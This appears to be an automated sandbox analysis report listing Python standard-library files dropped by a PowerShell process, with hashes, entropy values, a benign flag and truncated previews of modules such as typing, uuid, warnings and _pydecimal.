                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):24814
                              Entropy (8bit):5.661852434421576
                              Encrypted:false
                              SSDEEP:768:lmqmN0rU7dWJfETCat27aqNqV7WIWzaRHqmmM:HARWJf9HaqmaRORHqmB
                              MD5:127436EBA0EEC617CA11C38C4B6518B4
                              SHA1:4152DBF9623912B4BF2CBF1D312E36A4494317B1
                              SHA-256:4A59078622F652559945D491347B88EA85C9CCED9BCB1D9CA44C94B91CF1E3CA
                              SHA-512:5DF3114FECF6513946C0B8BEA6FBC0954D44EE10CFB7CE1CCA5D3DD9CE5CFE154620EB98669E72A5384158B4F395DC6B7F2FA001DA37FBFF92055D9A8FC00390
                              Malicious:false
                              Preview:.........U.f(U........................T.....d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.....d.d.l.m.Z...d.d.l.Z...e.j(..................d.e.j*..........................Z...e.j(..................d.e.j*..........................Z.d.d.l.Z.e.j0..................g.d...z...Z.[...G.d...d...e.j2..................d.d.................Z.d...Z.d...Z.d...Z.d.Z.d.Z.e...e.d.e.z...........z.....e.e.........z...Z d.Z!d.Z"d.Z#d.Z$d.Z%..e.e"e#e$e%........Z&d.Z'..e.d.d...........e.e'........z...Z(d.e'z...Z)..e.e(e)........Z*..e.d.e*d z...........Z+..e.e+e*e&........Z,d!..Z-e.j\..................d"..........Z/..e...e-..........Z0d#Z1d$Z2d%Z3d&Z4..e.e0d'z...e0d(z...........Z5..e.e0d)z...e0d*z...........Z6..e...e7e.jp....................e9e.d+.,..................Z:..e.d-e:........Z;..e.e,e;e6e!........Z<e e<z...Z=..e.e0d.z.....e.d/d.........z...e0d0z.....e.d1d.........z...........Z>..e.d2e.e5........Z?e...e.e?e,e;e>e!........z...Z@i.ZA..e-........D.]"..ZB
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):51562
                              Entropy (8bit):5.416373772582537
                              Encrypted:false
                              SSDEEP:768:nIolzd+RU99ql+uln9Ppp3x/AEx5YqJ43GOzsayUH2wj7S/LyFdBt:IIMRk9qNl9PPOdrN2i+DML
                              MD5:0DCB34D1001721F1B82ED2F616BC8C1B
                              SHA1:306A222604D94A32EA810D46DF945402964FC867
                              SHA-256:196785BD784916007DA11D4F7B3C799460B8333688E310B07341D37A178ECE64
                              SHA-512:2954C0810593E143CE8AD7251186419B2B56DA60319BC5EE2EA32F7CE8BD7F7B07F8B1A147EB4B10B363B253D4655E636DAABFAE4DFB4C87CAA8592E27907234
                              Malicious:false
                              Preview:.........U.f................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d9d...Z.d...Z.d:d...Z.d9d...Z.d9d...Z.d.Z.d.Z...G.d...d.........Z...e.........Z.d...Z.e.e.d.d.d.f.d...Z.e.e.d.d.f.d...Z.e.f.d...Z.d...Z.e.f.d...Z.d;d...Z.d<d...Z.d;d...Z.d=d...Z.d:d...Z.d:d...Z.d...Z ..G.d...d.........Z!d...Z"d...Z#d ..Z$d!..Z%d"Z&..G.d#..d$e'........Z(d%..Z)..e.jT..................d&g.d'..d(d)g..*........Z+d+..Z,d,Z-d-..Z...G.d...d/........Z/..G.d0..d1........Z0d2Z1d3Z2d4Z3d5Z4d6..Z5d7..Z6d8..Z7y.)>z@Extract, format and print information about Python stack traces......N)...suppress)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc..........................|...t.........j...................}.t.........j...................|.........j.................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14978
                              Entropy (8bit):5.237366621192304
                              Encrypted:false
                              SSDEEP:192:SNEoTSVEjOZZTsv9JH3xKotIdc/lJ/r4+yF:SNEiSVIYsv9NBKotIi/7/r4+yF
                              MD5:C5D38A269D5B92E2BFDE072A30C45E33
                              SHA1:23A0D92D7C87656B952439D7C8BBA43049BD535E
                              SHA-256:83437236D1D5C63D0E5AB989E104CD3BBCE11EA2B3509BDED6BAC3376A360F5B
                              SHA-512:7FF7179E86F9581D1F71459CA1C6959E0E9CFDA2840F26DF13F84FAB36B823CA10FD5C3966209021348E723269F22AFCC69CB089230C86EC5D2D6AE5C10CD505
                              Malicious:false
                              Preview:.........U.f>,........................@.....d.Z.d.d.l.Z.d...Z...e.e.........Z...e.d...........Z...e.e.j...........................Z...e.e.j...........................Z...e.e.j...........................Z.d...Z...e...e.................Z.d...Z...e...e.................Z.d...Z...e.........Z...e.e.........Z.e.j%............................d...Z...e.........Z...e.e.........Z...G.d...d.........Z...e...e.........j,..........................Z...e.e.........Z...e.g.j4..........................Z...e.e.j:..........................Z...e...e.........j>..........................Z ..e.e!jD..........................Z#..e.e$j...................d.............Z%..e.e.........Z&..e'..#.e'$.r8Z(..e.e(jR..........................Z*..e.e(jR..................jV..........................Z,Y.d.Z([(n.d.Z([(w.w.x.Y.w...e.e.j...........................Z-..e.e.j\..........................Z/[.[.[.[.[.[.[.d.d...Z0d...Z1d.d...Z2d...Z3d...Z4..G.d...d.........Z5..G.d...d.........Z6d...Z7..e.e8e9............Z:..e.e9e!z...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):141899
                              Entropy (8bit):5.388281143443104
                              Encrypted:false
                              SSDEEP:3072:JKmtDbTXAEMnp4Tp8HTz1pUVND48KTCk0cRh2q:8mtAE6KezgrFy0M
                              MD5:41B4631C9DF9A388D05FE993514454B1
                              SHA1:EF21726D884EE7B997C10C3D749DA4279885A13F
                              SHA-256:696ECFBCF3DCBD6143E9FF9C51AE2265E5B1A414AD8147708567863799EA78C4
                              SHA-512:508145C5E4A7D9B8881F9C2246406E41C607E9755B8628B8D48CA86FFE7DCBDC7FF3F7ABD4A49A3A3F9A3A1820039DF213EED3172EEF8AB2E37D1C7E8C26EFB4
                              Malicious:false
                              Preview:.........U.f8..............................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d...Z.d.d.d...d...Z.d...Z d...Z!d...Z"d...Z#d...Z$d...Z%d.d...d...Z&d...Z'd...Z(d...Z)d...Z*g.Z+i.Z,d.d.d...d...Z-..e.........f.d...Z/..G.d...d.........Z0..G.d...d.........Z1..G.d ..d!e0e1d.."........Z2..G.d#..d$e2d.."........Z3..G.d%..d&e4........Z5..G.d'..d(e5.)........Z6e2d*..........Z7e2d+..........Z8e2d,..........Z9e2d-..........Z:e2d...........Z;e2d/..........Z<e2d0..........Z=d1..Z>e2d2..........Z?e3..e-d...........d3..................Z@e2d4..........ZAe2d5..........ZBe2d6..........ZC..G.d7..d8e0d.."........ZDd9e6d:eEf.d;..ZFd9e6d:eEf.d<..ZG..G.d=..d>........ZHd?..ZId@..ZJdA..ZKdB..ZLe-dC..........ZMdD..ZNdE..ZO..G.dF..dGe0d.."........ZP..G.dH..dIePd.."........ZQ..G.dJ..dKe1ePd.."........ZR..G.dL..dMeRd.."........ZS..G.dN..dOe1eQd.."........ZT..G.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):33046
                              Entropy (8bit):5.542692066530325
                              Encrypted:false
                              SSDEEP:768:WI7MhiFf2VybAHW4WFvKYDya8i5iPF+g4sCvPVW2LisQYzUN/TpxeCQ5u:WI70GOYb0J+v9SYzvhu
                              MD5:E6666D77B88239FAEE265F51F40F4B24
                              SHA1:98B0D78C45E8A5A988489451C79443645FC66074
                              SHA-256:471B7AC80FBF507678D28DF19B316AC74048CBA41CAD131DEA34A91F244DBA80
                              SHA-512:2E96EAD28664E1C7ACA30260B569F26AEBC17ECD509B51880E93CE6D827F5D35C18FFF916CAFF8F752EDC04040FA8FFF3286B78D1F96A55E89788264C3FFA524
                              Malicious:false
                              Preview:.........U.f.v........................&.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.e.j...................d.v.r.d.x.Z.Z.n.d.d.l.Z...e.j...........................Z.e.d.k(..Z.e.d.k(..Z.d.Z.d.Z.e.r.d.Z.d.Z.g.d...\...Z.Z.Z.Z.e.Z.e.Z...e.e...........G.d...d.................Z...G.d...d.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!d...Z"d...Z#..d.d.l$Z$..e%e$d.d.........Z&..e%e$d.d.........Z'e$jP..................Z)d...Z+d ..Z,d!..Z-d"..Z.e.r.e.e.g.Z/n4e.j...................d#k(..r.e.e.e!g.Z/n.e.j...................d$k(..r.g.Z/n.e.r.e!g.Z/n.e.e.e.e!e g.Z/e.j`..................d%k(..r.e,g.e/z...Z1n.e.j`..................d&k(..r.e-g.e/z...Z1n.e/Z1d.a2d'..Z3d.a4d2d(..Z5d)..Z6d*..Z7d+..Z8d,..Z9..e.d-........Z:..e.d.........Z;..e.d/........Z<..e.d0........Z=e>d1k(..r...e9..........y.y.#.e*$.r...d.Z$d.Z&d.Z'd.Z)Y...w.x.Y.w.)3aQ...UUID objects (universally unique identifiers) according to RFC 4122...This module provides immutable UUID objects (class UUID) and the functions.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):23831
                              Entropy (8bit):5.368242343429052
                              Encrypted:false
                              SSDEEP:384:2qnFTtE80PtQo6pT1GFOg4DSnSdBTEYTHnNFNe35pwKVvBb2o7qPOjIV:2qFTtE80PtQo6NmX4uSnEYTtFNe35pJO
                              MD5:40147E4AF97140F5A9B526EB891B11E9
                              SHA1:E7DB64F59975D922E98C80437692FA461F15D46C
                              SHA-256:81E9996932122F1D33B8DB5319F1C75F26B52B636855F41319BF73732EB2502D
                              SHA-512:1F534767745779667873D84C6F28A3F04FFCCF69F06C26DE578A96AE43C530DE3EC8D57ECC897C9D9586B927553F5AB68B8C0ED001D790F28BDE99F00766D1E9
                              Malicious:false
                              Preview:.........U.fTW........................8.....d.Z.d.d.l.Z.g.d...Z.d0d...Z.d1d...Z.d...Z.d...Z.e.Z.d...Z.e.Z.d...Z.d.e.d.d.d.f.d...Z.e.d.d.f.d...Z.d...Z.d...Z...G.d...d.e.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d2d.d...d...Z.....d3d...Z...G.d...d e.........Z...G.d!..d"e.........Z.d#Z.e.f.e.j@..................d$..d%..Z!d&..Z"..d.d'l#m$Z$m%Z%m&Z&m.Z.m.Z.m'Z'..e%Z(e&Z)d(Z*..e.e.jZ............................e*sA..e.e.d+........s8..e.d)e/d,d..-............e.d.e/d../............e.d.e0d../............e.d.e1d../............e.d.e2d../..........[*y.#.e+$.r...g.Z$d)Z(i.Z)d.a,d*..Z'd.Z*Y..kw.x.Y.w.)4z&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc.....................:.....t.........|.|.|.|.|.|.........}.t.........|...........y.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..li
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):31387
                              Entropy (8bit):5.006178486752796
                              Encrypted:false
                              SSDEEP:768:tvDi/uW0pCXF2wRp2c1mfbmWra0c7R1Du:tbi/uW0i2wZmfb3ZcLu
                              MD5:24171D8A806837859CD0E620394320B7
                              SHA1:513B244EECC95F59F1A7E9163046A741733B582E
                              SHA-256:82696BDE8A57EF6B2BDB721E912751C710A50E1FB48C0DF2E790FB4FA9329A57
                              SHA-512:B761988624CCEDD69410FA2F58CE3A199F0C9A49C654C092C6C4DD1C4AB2B2E9EEDCD327679ACF82FA3801C66AF780228A38449D95075582036C1CCA0484B444
                              Malicious:false
                              Preview:.........U.f.V........................2.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j$..................j'..................e.............G.d...d.e.........Z...G.d...d.e.j*..........................Z...G.d...d.e.........Z...G.d...d.e.j*..........................Z...G.d...d.........Z.y.).ztWeak reference support for Python...This module is an implementation of PEP 205:..https://peps.python.org/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec.....................R.......e.Z.d.Z.d.Z.d.Z.d.d...Z...f.d...Z.d...Z.d...Z.e.j...................Z...x.Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4129
                              Entropy (8bit):5.054915225610184
                              Encrypted:false
                              SSDEEP:96:1086w0VnCwE4/o5I2Wqpt8u/GqhqCbuwAknVbRo61RmT+se8R2HR7:10G0VVoW+GqI4uwfnVbRo2Rk4R7
                              MD5:41F88833D549197CEC2C7B52CB9D651E
                              SHA1:F01590397FAFAEBC2F6273BE125C02D518D7A3B5
                              SHA-256:4BBEDE7FC7B15C30DD3CDD54F40347DD21F9B6E65D1CA38BF831A7B50D456583
                              SHA-512:5CB991A99CA16B6137BADED771B736090F6F25ED885B35B1F681F4964F0C503867CB1ECCD05CF25F5DCF537898878430F53B051CA197A870B050BF992721BA8F
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: new.bat, Detection: malicious, Browse
                              • Filename: pypa.py, Detection: malicious, Browse
                              Preview:"""Shared AIX support functions."""....import sys..import sysconfig......# Taken from _osx_support _read_output function..def _read_cmd_output(commandstring, capture_stderr=False):.. """Output from successful command execution or None""".. # Similar to os.popen(commandstring, "r").read(),.. # but without actually using os.popen because that.. # function is not usable during python bootstrap... import os.. import contextlib.. fp = open("/tmp/_aix_support.%s"%(.. os.getpid(),), "w+b").... with contextlib.closing(fp) as fp:.. if capture_stderr:.. cmd = "%s >'%s' 2>&1" % (commandstring, fp.name).. else:.. cmd = "%s 2>/dev/null >'%s'" % (commandstring, fp.name).. return fp.read() if not os.system(cmd) else None......def _aix_tag(vrtl, bd):.. # type: (List[int], int) -> str.. # Infer the ABI bitwidth from maxsize (assuming 64 bit as the default).. _sz = 32 if sys.maxsize == (2**31-1) else 64.. _bd = bd if b
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):33255
                              Entropy (8bit):4.57321505202262
                              Encrypted:false
                              SSDEEP:768:IOPxpq3OCTN1Ewkx023y0SuqlTWbbYXxeF6tTgA/rTNq4UBR2npWtvVUCloh:lPxPCTqYh4kNpivVUCloh
                              MD5:B10776F4C7D732CED7BD8A708E642CF3
                              SHA1:964C2AF043BC4023F844497EBAEE379D9575FFEF
                              SHA-256:C3454744BF6B649F19E91CA1411E88FFD608E86F58375F3F8CEE5CA53473E331
                              SHA-512:AB64E37BBCE55D483EC48E3D87F54128048587DDED0C9A73E6584EE81EE60A30AA477AC5981A344ACD803CE4D7B024350ED32771C9E8D37A751F34DDC55F360C
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: new.bat, Detection: malicious, Browse
                              • Filename: pypa.py, Detection: malicious, Browse
                              Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for collections, according to PEP 3119.....Unit tests are in test_collections..."""....############ Maintenance notes #########################################..#..# ABCs are different from other standard library modules in that they..# specify compliance tests. In general, once an ABC has been published,..# new methods (either abstract or concrete) cannot be added...#..# Though classes that inherit from an ABC would automatically receive a..# new mixin method, registered classes would become non-compliant and..# violate the contract promised by ``isinstance(someobj, SomeABC)``...#..# Though irritating, the correct procedure for adding new abstract or..# mixin methods is to create a new ABC as a subclass of the previous..# ABC. For example, union(), intersection(), and difference() cannot..# be added to Set but could go into a new ABC that extends Se
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):9013
                              Entropy (8bit):5.071668224051392
                              Encrypted:false
                              SSDEEP:192:jX+gYVVcndom2qXur3co6d/f1OlQcrG5EbhqRbRq:T+gYVVcnrkco6d/f1OlQcC5ES1q
                              MD5:4373F824346A53ECD29028BEF4655F56
                              SHA1:88727AA744742F6C1C528C92DAA928C84933D995
                              SHA-256:10C81E8803CFFAAC8BDF085CD01EA948C3ADFA32263B2D452BAFD5B5519410F6
                              SHA-512:4032ABD13CB607F3D018B41D1B62EBB57195A54D0ED0F7E1F3D32BCA565A1D837BCA75E8E032296ADC25C9A1BB07C0AA77EB696DACEE2EC5065A49EDF7798A28
                              Malicious:false
                              Preview:# This module is used to map the old Python 2 names to the new names used in..# Python 3 for the pickle module. This needed to make pickle streams..# generated with Python 2 loadable by Python 3.....# This is a copy of lib2to3.fixes.fix_imports.MAPPING. We cannot import..# lib2to3 and use the mapping defined there, because lib2to3 uses pickle...# Thus, this could cause the module to be imported recursively...IMPORT_MAPPING = {.. '__builtin__' : 'builtins',.. 'copy_reg': 'copyreg',.. 'Queue': 'queue',.. 'SocketServer': 'socketserver',.. 'ConfigParser': 'configparser',.. 'repr': 'reprlib',.. 'tkFileDialog': 'tkinter.filedialog',.. 'tkSimpleDialog': 'tkinter.simpledialog',.. 'tkColorChooser': 'tkinter.colorchooser',.. 'tkCommonDialog': 'tkinter.commondialog',.. 'Dialog': 'tkinter.dialog',.. 'Tkdnd': 'tkinter.dnd',.. 'tkFont': 'tkinter.font',.. 'tkMessageBox': 'tkinter.messagebox',.. 'ScrolledText': 'tkinter.scrolledtext',.. 'Tkconstants':
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5843
                              Entropy (8bit):4.312570122004757
                              Encrypted:false
                              SSDEEP:96:ArOasdGagyvLQOAj+pPbO6bf/Zvlf0rwazuza6:eOasdbtlb/fcrwazuza6
                              MD5:F75E9299E14E9B11FD7DAE94D061253E
                              SHA1:6025D13A35D283496DC83444366FE93E22B03B61
                              SHA-256:A10CF1A317374641BCDB8252499E9CB9D4D6E774AC724EDFDDDD0433EAD771D9
                              SHA-512:BEE88E9C44A2477E7679F47F414FF8327AD06EF4E81D65405A1D55E9684040838C9F30F3F0A35FF0C5A7E850B858FE83E48734BE7EA171A1F5DBB75FB45A2FB7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: new.bat, Detection: malicious, Browse
                              • Filename: 00#U2800.exe, Detection: malicious, Browse
                              • Filename: pypa.py, Detection: malicious, Browse
                              • Filename: Tool-Scan-Proxy.doc, Detection: malicious, Browse
                              • Filename: erg.exe, Detection: malicious, Browse
                              • Filename: erg.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Trojan.KillProc2.18834.21003.25927.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Trojan.KillProc2.18834.21003.25927.exe, Detection: malicious, Browse
                              • Filename: bluemonster.bat, Detection: malicious, Browse
                              • Filename: imagine-produs-103c3g45d4e2d22c19d3f47611e2e.BAT.bat, Detection: malicious, Browse
                              Preview:"""Internal classes used by the gzip, lzma and bz2 modules"""....import io..import sys....BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE # Compressed data read chunk size......class BaseStream(io.BufferedIOBase):.. """Mode-checking helper functions.""".... def _check_not_closed(self):.. if self.closed:.. raise ValueError("I/O operation on closed file").... def _check_can_read(self):.. if not self.readable():.. raise io.UnsupportedOperation("File not open for reading").... def _check_can_write(self):.. if not self.writable():.. raise io.UnsupportedOperation("File not open for writing").... def _check_can_seek(self):.. if not self.readable():.. raise io.UnsupportedOperation("Seeking is only supported ".. "on files open for reading").. if not self.seekable():.. raise io.UnsupportedOperation("The underlying file object "..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):15049
                              Entropy (8bit):4.144690404366886
                              Encrypted:false
                              SSDEEP:384:hJdW3aalUU2IJWEY4tokA+jFW/tFoak6iExy/LemE/9ueOU:hJRalUU2IJWIo+jEFGaw1iN
                              MD5:2DFE8125174DDC3D0694E41EB8489C58
                              SHA1:EF097AC9988D1E06BE47D771008B53797682156D
                              SHA-256:914361CF055D5D2E1B69A2603A5C94B22DEDB987D72CE9F791AFEC0524718F28
                              SHA-512:E5657D6619EA50AEE6051808F5C153B75438C97231010F898D9884937C7370241C4C41FA695B002D1AEA0489994F4FD96D3ADE037ECF30D761A99019F9E1E043
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Shared support for scanning document type declarations in HTML and XHTML.....This module is used as a foundation for the html.parser module. It has no..documented public API and should not be used directly....."""....import re...._declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match.._declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match.._commentclose = re.compile(r'--\s*>').._markedsectionclose = re.compile(r']\s*]\s*>')....# An analysis of the MS-Word extensions is available at..# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf...._msmarkedsectionclose = re.compile(r']\s*>')....del re......class ParserBase:.. """Parser base class which provides some common support methods used.. by the SGML/HTML and XHTML parsers.""".... def __init__(self):.. if self.__class__ is ParserBase:.. raise RuntimeError(.. "_markupbase.ParserBase must be subclassed").... def reset(self):.. self.lineno = 1..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):22602
                              Entropy (8bit):4.723979551934765
                              Encrypted:false
                              SSDEEP:384:KEQb8Fu0jFaUTj065gw4DehE58J+pPSUbjaMVqnV6sxlVItVnCfvQY+y1q6NT:KB8Fu0jFaYj0sgve81pP3SAYE2
                              MD5:09B076187C2B59E07F5C46CF47B03DE7
                              SHA1:26C2EDF625F3FEB5C6FBFE95646F3C861BB61033
                              SHA-256:B72A3C3EC5AEF4C8B67A27482DC5730F6CA0A1F763C73D7F5EDD37B7A180AABB
                              SHA-512:BA12EA788469813D7FFCC0F6E8CCB89943ECDAECC6C7CA6DD53C43351B7CB191A7AFC6DA62C0DB62037F97B4F31787644239E7C56488F948D4F86977F6C46843
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Shared OS X support functions."""....import os..import re..import sys....__all__ = [.. 'compiler_fixup',.. 'customize_config_vars',.. 'customize_compiler',.. 'get_platform_osx',..]....# configuration variables that may contain universal build flags,..# like "-arch" or "-isdkroot", that may need customization for..# the user environment.._UNIVERSAL_CONFIG_VARS = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS', 'BASECFLAGS',.. 'BLDSHARED', 'LDSHARED', 'CC', 'CXX',.. 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS')....# configuration variables that may contain compiler calls.._COMPILER_CONFIG_VARS = ('BLDSHARED', 'LDSHARED', 'CC', 'CXX')....# prefix added to original configuration variable names.._INITPRE = '_OSX_SUPPORT_INITIAL_'......def _find_executable(executable, path=None):.. """Tries to find 'executable' in the directories listed in 'path'..... A string listing dir
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6336
                              Entropy (8bit):4.398612520141537
                              Encrypted:false
                              SSDEEP:192:tChBz2a5ZMoU3JhZqwCtb4kmAp0PT5L7AH4/kt/E/StLp/kL/5:tChtjgJhZZKb4qH/7O
                              MD5:E9F2D6D09F06D7E0772B74B32759881C
                              SHA1:6E4A2145565B7B9436CB7DB5CF18FA97E9B3BEE0
                              SHA-256:8F790C97331A66EA442964314843F7CC8863FB3D9B899183F6D02598D4361A5C
                              SHA-512:D3D22D17387A04B79AB54C7F71E994A075AB309057A8F98A3972E0F17535C4D905342D282ECF3D1A8A99351BBC8AEC207E7E277B0377255572153A80EFBB07A6
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:from _weakrefset import WeakSet......def get_cache_token():.. """Returns the current ABC cache token..... The token is an opaque object (supporting equality testing) identifying the.. current version of the ABC cache for virtual subclasses. The token changes.. with every call to ``register()`` on any ABC... """.. return ABCMeta._abc_invalidation_counter......class ABCMeta(type):.. """Metaclass for defining Abstract Base Classes (ABCs)..... Use this metaclass to create an ABC. An ABC can be subclassed.. directly, and then acts as a mix-in class. You can also register.. unrelated concrete classes (even built-in classes) and unrelated.. ABCs as 'virtual subclasses' -- these and their descendants will.. be considered subclasses of the registering ABC by the built-in.. issubclass() function, but the registering ABC won't show up in.. their MRO (Method Resolution Order) nor will method.. implementations defined by the registering ABC be callable
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):94740
                              Entropy (8bit):4.486813729670233
                              Encrypted:false
                              SSDEEP:1536:a9IQYbeLy7YOd9BF87J6lQ3r6yZeUE/v0B11YwHYX:a9IQYS2YOdm7J2lyMUhc+s
                              MD5:6A6D2E4E3731246BA2EC11BFB0B8AA6E
                              SHA1:38672C2367F40B470B68900453A9B154DD052EF2
                              SHA-256:5D59A58B96462239916D5E3F24A161BEC46A70D7CB12C21C7BD14B39B46AEAD1
                              SHA-512:C003A47EC209F925230ABAA969B6D0202F0CEB7B36F338BB38A95F8EFE95846AA180636AE916638B8F79361B50826283404117FD9E2D5E5B05C772F342C684BA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:"""Concrete date/time and related types.....See http://www.iana.org/time-zones/repository/tz-link.html for..time zone and DST data sources..."""....__all__ = ("date", "datetime", "time", "timedelta", "timezone", "tzinfo",.. "MINYEAR", "MAXYEAR", "UTC")......import time as _time..import math as _math..import sys..from operator import index as _index....def _cmp(x, y):.. return 0 if x == y else 1 if x > y else -1....def _get_class_module(self):.. module_name = self.__class__.__module__.. if module_name == '_pydatetime':.. return 'datetime'.. else:.. return module_name....MINYEAR = 1..MAXYEAR = 9999.._MAXORDINAL = 3652059 # date.max.toordinal()....# Utility functions, adapted from Python's Demo/classes/Dates.py, which..# also assumes the current Gregorian calendar indefinitely extended in..# both directions. Difference: Dates.py calls January 1 of year 0 day..# number 1. The code here calls January 1 of year 1 day number 1. This is..# to match the
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):235645
                              Entropy (8bit):4.563560590127949
                              Encrypted:false
                              SSDEEP:6144:fPpNAkfLyemfbPcKcNZuUxOapxHPfm+LymnEvD:HvxPA
                              MD5:6B5437EA2015E0F1F0CFBB24D18842AB
                              SHA1:2328558422C867B7BF586435989AABE164E9422C
                              SHA-256:B4DE5BF447E53FD324EC33A95D32193C1B7DD12B375481566CF25AC2D348F869
                              SHA-512:6AB6CBC1E262512D34991BB68FEE9F8C33D887107EA1B2EDCEF005F06B33E4D1A2B0D812A0DF0456D8352148D65B601D9ACCD6660C3B5C3F5413F712858779E2
                              Malicious:false
                              Preview:# Copyright (c) 2004 Python Software Foundation...# All rights reserved.....# Written by Eric Price <eprice at tjhsst.edu>..# and Facundo Batista <facundo at taniquetil.com.ar>..# and Raymond Hettinger <python at rcn.com>..# and Aahz <aahz at pobox.com>..# and Tim Peters....# This module should be kept in sync with the latest updates of the..# IBM specification as it evolves. Those updates will be treated..# as bug fixes (deviation from the spec is a compatibility, usability..# bug) and will be backported. At this point the spec is stabilizing..# and the updates are becoming fewer, smaller, and less significant....."""..This is an implementation of decimal floating point arithmetic based on..the General Decimal Arithmetic Specification:.... http://speleotrove.com/decimal/decarith.html....and IEEE standard 854-1987:.... http://en.wikipedia.org/wiki/IEEE_854-1987....Decimal floating point has finite precision with arbitrarily large bounds.....The purpose of this modul
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):96291
                              Entropy (8bit):4.364506935988488
                              Encrypted:false
                              SSDEEP:1536:viNtkV5SO52T4fWEai+6wsWB/5bjQsngmRAUd:viNtkr5SuWEai+6bWp5bjLgmR5
